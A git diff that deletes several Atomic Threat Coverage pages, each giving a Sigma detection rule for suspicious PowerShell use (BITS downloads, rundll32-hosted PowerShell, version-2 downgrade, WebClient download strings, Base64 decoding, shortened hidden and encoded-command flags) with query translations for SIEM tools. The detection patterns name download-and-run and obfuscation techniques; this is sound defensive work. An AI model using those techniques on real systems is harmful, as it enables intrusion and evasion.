-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f67dbfce-93bc-440d-86ad-a95ae8858c90 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Bitsadmin Job via PowerShell",
-    "description": "Detect download by BITS jobs via PowerShell",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.persistence",
-      "attack.t1197"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Start\\-BitsTransfer*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Start\\-BitsTransfer*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Bitsadmin Job via PowerShell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\powershell.exe AND CommandLine.keyword:*Start\-BitsTransfer*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\powershell.exe" CommandLine="*Start-BitsTransfer*") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\powershell.exe" CommandLine="*Start-BitsTransfer*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\powershell\.exe)(?=.*.*Start-BitsTransfer.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_dll_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_dll_execution.md
deleted file mode 100644
index 2dbb317..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_dll_execution.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Detection of PowerShell Execution via DLL       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/p3nt4/PowerShdll/blob/master/README.md](https://github.com/p3nt4/PowerShdll/blob/master/README.md)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>car.2014-04-003</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Detection of PowerShell Execution via DLL
-id: 6812a10b-60ea-420c-832f-dfcc33b646ba
-status: experimental
-description: Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll
-references:
-    - https://github.com/p3nt4/PowerShdll/blob/master/README.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - car.2014-04-003
-    - attack.t1059.001
-author: Markus Neis
-date: 2018/08/25
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image:
-            - '*\rundll32.exe'
-    selection2:
-        Description:
-            - '*Windows-Hostprozess (Rundll32)*'
-    selection3:
-        CommandLine:
-            - '*Default.GetString*'
-            - '*FromBase64String*'
-    condition: (selection1 or selection2) and selection3
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1") -and (($_.message -match "Image.*.*\\rundll32.exe") -or ($_.message -match "Description.*.*Windows-Hostprozess (Rundll32).*")) -and ($_.message -match "CommandLine.*.*Default.GetString.*" -or $_.message -match "CommandLine.*.*FromBase64String.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\rundll32.exe) OR winlog.event_data.Description.keyword:(*Windows\-Hostprozess\ \(Rundll32\)*)) AND winlog.event_data.CommandLine.keyword:(*Default.GetString* OR *FromBase64String*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6812a10b-60ea-420c-832f-dfcc33b646ba <<EOF
-{
-  "metadata": {
-    "title": "Detection of PowerShell Execution via DLL",
-    "description": "Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "car.2014-04-003",
-      "attack.t1059.001"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\rundll32.exe) OR winlog.event_data.Description.keyword:(*Windows\\-Hostprozess\\ \\(Rundll32\\)*)) AND winlog.event_data.CommandLine.keyword:(*Default.GetString* OR *FromBase64String*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\rundll32.exe) OR winlog.event_data.Description.keyword:(*Windows\\-Hostprozess\\ \\(Rundll32\\)*)) AND winlog.event_data.CommandLine.keyword:(*Default.GetString* OR *FromBase64String*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Detection of PowerShell Execution via DLL'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\rundll32.exe) OR Description.keyword:(*Windows\-Hostprozess \(Rundll32\)*)) AND CommandLine.keyword:(*Default.GetString* *FromBase64String*))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\rundll32.exe") OR (Description="*Windows-Hostprozess (Rundll32)*")) (CommandLine="*Default.GetString*" OR CommandLine="*FromBase64String*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image IN ["*\\rundll32.exe"] OR Description IN ["*Windows-Hostprozess (Rundll32)*"]) CommandLine IN ["*Default.GetString*", "*FromBase64String*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*(?:.*.*\rundll32\.exe)|.*(?:.*.*Windows-Hostprozess \(Rundll32\).*))))(?=.*(?:.*.*Default\.GetString.*|.*.*FromBase64String.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_downgrade_attack.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_downgrade_attack.md
deleted file mode 100644
index 7972679..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_downgrade_attack.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | PowerShell Downgrade Attack       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Penetration Test</li><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/](http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/)</li></ul>  |
-| **Author**               | Harish Segar (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Downgrade Attack
-id: b3512211-c67e-4707-bedc-66efc7848863
-related:
-    - id: 6331d09b-4785-4c13-980f-f96661356249
-      type: derived
-status: experimental
-description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-references:
-    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Harish Segar (rule)
-date: 2020/03/20
-falsepositives:
-    - Penetration Test
-    - Unknown
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains:
-            - ' -version 2 '
-            - ' -versio 2 '
-            - ' -versi 2 '
-            - ' -vers 2 '
-            - ' -ver 2 '
-            - ' -ve 2 '
-        Image|endswith: '\powershell.exe'
-    condition: selection
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -version 2 .*" -or $_.message -match "CommandLine.*.* -versio 2 .*" -or $_.message -match "CommandLine.*.* -versi 2 .*" -or $_.message -match "CommandLine.*.* -vers 2 .*" -or $_.message -match "CommandLine.*.* -ver 2 .*" -or $_.message -match "CommandLine.*.* -ve 2 .*") -and $_.message -match "Image.*.*\\powershell.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*\ \-version\ 2\ * OR *\ \-versio\ 2\ * OR *\ \-versi\ 2\ * OR *\ \-vers\ 2\ * OR *\ \-ver\ 2\ * OR *\ \-ve\ 2\ *) AND winlog.event_data.Image.keyword:*\\powershell.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b3512211-c67e-4707-bedc-66efc7848863 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Downgrade Attack",
-    "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*\\ \\-version\\ 2\\ * OR *\\ \\-versio\\ 2\\ * OR *\\ \\-versi\\ 2\\ * OR *\\ \\-vers\\ 2\\ * OR *\\ \\-ver\\ 2\\ * OR *\\ \\-ve\\ 2\\ *) AND winlog.event_data.Image.keyword:*\\\\powershell.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*\\ \\-version\\ 2\\ * OR *\\ \\-versio\\ 2\\ * OR *\\ \\-versi\\ 2\\ * OR *\\ \\-vers\\ 2\\ * OR *\\ \\-ver\\ 2\\ * OR *\\ \\-ve\\ 2\\ *) AND winlog.event_data.Image.keyword:*\\\\powershell.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Downgrade Attack'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(* \-version 2 * * \-versio 2 * * \-versi 2 * * \-vers 2 * * \-ver 2 * * \-ve 2 *) AND Image.keyword:*\\powershell.exe)
-```
-
-
-### splunk
-    
-```
-((CommandLine="* -version 2 *" OR CommandLine="* -versio 2 *" OR CommandLine="* -versi 2 *" OR CommandLine="* -vers 2 *" OR CommandLine="* -ver 2 *" OR CommandLine="* -ve 2 *") Image="*\\powershell.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* -version 2 *", "* -versio 2 *", "* -versi 2 *", "* -vers 2 *", "* -ver 2 *", "* -ve 2 *"] Image="*\\powershell.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.* -version 2 .*|.*.* -versio 2 .*|.*.* -versi 2 .*|.*.* -vers 2 .*|.*.* -ver 2 .*|.*.* -ve 2 .*))(?=.*.*\powershell\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_download.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_download.md
deleted file mode 100644
index ebf76f1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_download.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | PowerShell Download from URL       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a Powershell process that contains download commands in its command line string |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Download from URL
-id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
-status: experimental
-description: Detects a Powershell process that contains download commands in its command line string
-author: Florian Roth
-date: 2019/01/16
-tags:
-    - attack.t1086
-    - attack.execution
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\powershell.exe'
-        CommandLine:
-            - '*new-object system.net.webclient).downloadstring(*'
-            - '*new-object system.net.webclient).downloadfile(*'
-            - '*new-object net.webclient).downloadstring(*'
-            - '*new-object net.webclient).downloadfile(*'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\powershell.exe" -and ($_.message -match "CommandLine.*.*new-object system.net.webclient).downloadstring(.*" -or $_.message -match "CommandLine.*.*new-object system.net.webclient).downloadfile(.*" -or $_.message -match "CommandLine.*.*new-object net.webclient).downloadstring(.*" -or $_.message -match "CommandLine.*.*new-object net.webclient).downloadfile(.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\powershell.exe AND winlog.event_data.CommandLine.keyword:(*new\-object\ system.net.webclient\).downloadstring\(* OR *new\-object\ system.net.webclient\).downloadfile\(* OR *new\-object\ net.webclient\).downloadstring\(* OR *new\-object\ net.webclient\).downloadfile\(*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3b6ab547-8ec2-4991-b9d2-2b06702a48d7 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Download from URL",
-    "description": "Detects a Powershell process that contains download commands in its command line string",
-    "tags": [
-      "attack.t1086",
-      "attack.execution",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:(*new\\-object\\ system.net.webclient\\).downloadstring\\(* OR *new\\-object\\ system.net.webclient\\).downloadfile\\(* OR *new\\-object\\ net.webclient\\).downloadstring\\(* OR *new\\-object\\ net.webclient\\).downloadfile\\(*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:(*new\\-object\\ system.net.webclient\\).downloadstring\\(* OR *new\\-object\\ system.net.webclient\\).downloadfile\\(* OR *new\\-object\\ net.webclient\\).downloadstring\\(* OR *new\\-object\\ net.webclient\\).downloadfile\\(*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Download from URL'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\powershell.exe AND CommandLine.keyword:(*new\-object system.net.webclient\).downloadstring\(* *new\-object system.net.webclient\).downloadfile\(* *new\-object net.webclient\).downloadstring\(* *new\-object net.webclient\).downloadfile\(*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\powershell.exe" (CommandLine="*new-object system.net.webclient).downloadstring(*" OR CommandLine="*new-object system.net.webclient).downloadfile(*" OR CommandLine="*new-object net.webclient).downloadstring(*" OR CommandLine="*new-object net.webclient).downloadfile(*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\powershell.exe" CommandLine IN ["*new-object system.net.webclient).downloadstring(*", "*new-object system.net.webclient).downloadfile(*", "*new-object net.webclient).downloadstring(*", "*new-object net.webclient).downloadfile(*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\powershell\.exe)(?=.*(?:.*.*new-object system\.net\.webclient\)\.downloadstring\(.*|.*.*new-object system\.net\.webclient\)\.downloadfile\(.*|.*.*new-object net\.webclient\)\.downloadstring\(.*|.*.*new-object net\.webclient\)\.downloadfile\(.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_frombase64string.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_frombase64string.md
deleted file mode 100644
index 62308fd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_frombase64string.md
+++ /dev/null
@@ -1,172 +0,0 @@
-| Title                    | FromBase64String Command Line       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious FromBase64String expressions in command line arguments |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrative script libraries</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639](https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: FromBase64String Command Line
-id: e32d4572-9826-4738-b651-95fa63747e8a
-status: experimental
-description: Detects suspicious FromBase64String expressions in command line arguments
-references:
-    - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
-author: Florian Roth
-date: 2020/01/29
-tags: 
-    - attack.t1027
-    - attack.defense_evasion
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains: '::FromBase64String('
-    condition: selection
-falsepositives:
-    - Administrative script libraries
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*::FromBase64String(.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\:\:FromBase64String\(*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e32d4572-9826-4738-b651-95fa63747e8a <<EOF
-{
-  "metadata": {
-    "title": "FromBase64String Command Line",
-    "description": "Detects suspicious FromBase64String expressions in command line arguments",
-    "tags": [
-      "attack.t1027",
-      "attack.defense_evasion"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\:\\:FromBase64String\\(*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\:\\:FromBase64String\\(*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'FromBase64String Command Line'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*\:\:FromBase64String\(*
-```
-
-
-### splunk
-    
-```
-CommandLine="*::FromBase64String(*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*::FromBase64String(*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*::FromBase64String\(.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_suspicious_parameter_variation.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_suspicious_parameter_variation.md
deleted file mode 100644
index 5482322..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_suspicious_parameter_variation.md
+++ /dev/null
@@ -1,216 +0,0 @@
-| Title                    | Suspicious PowerShell Parameter Substring       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious PowerShell invocation with a parameter substring |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier](http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier)</li></ul>  |
-| **Author**               | Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PowerShell Parameter Substring
-id: 36210e0d-5b19-485d-a087-c096088885f0
-status: experimental
-description: Detects suspicious PowerShell invocation with a parameter substring
-references:
-    - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\Powershell.exe'
-        CommandLine:
-            - ' -windowstyle h '
-            - ' -windowstyl h'
-            - ' -windowsty h'
-            - ' -windowst h'
-            - ' -windows h'
-            - ' -windo h'
-            - ' -wind h'
-            - ' -win h'
-            - ' -wi h'
-            - ' -win h '
-            - ' -win hi '
-            - ' -win hid '
-            - ' -win hidd '
-            - ' -win hidde '
-            - ' -NoPr '
-            - ' -NoPro '
-            - ' -NoProf '
-            - ' -NoProfi '
-            - ' -NoProfil '
-            - ' -nonin '
-            - ' -nonint '
-            - ' -noninte '
-            - ' -noninter '
-            - ' -nonintera '
-            - ' -noninterac '
-            - ' -noninteract '
-            - ' -noninteracti '
-            - ' -noninteractiv '
-            - ' -ec '
-            - ' -encodedComman '
-            - ' -encodedComma '
-            - ' -encodedComm '
-            - ' -encodedCom '
-            - ' -encodedCo '
-            - ' -encodedC '
-            - ' -encoded '
-            - ' -encode '
-            - ' -encod '
-            - ' -enco '
-            - ' -en '
-    condition: selection
-falsepositives:
-    - Penetration tests
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
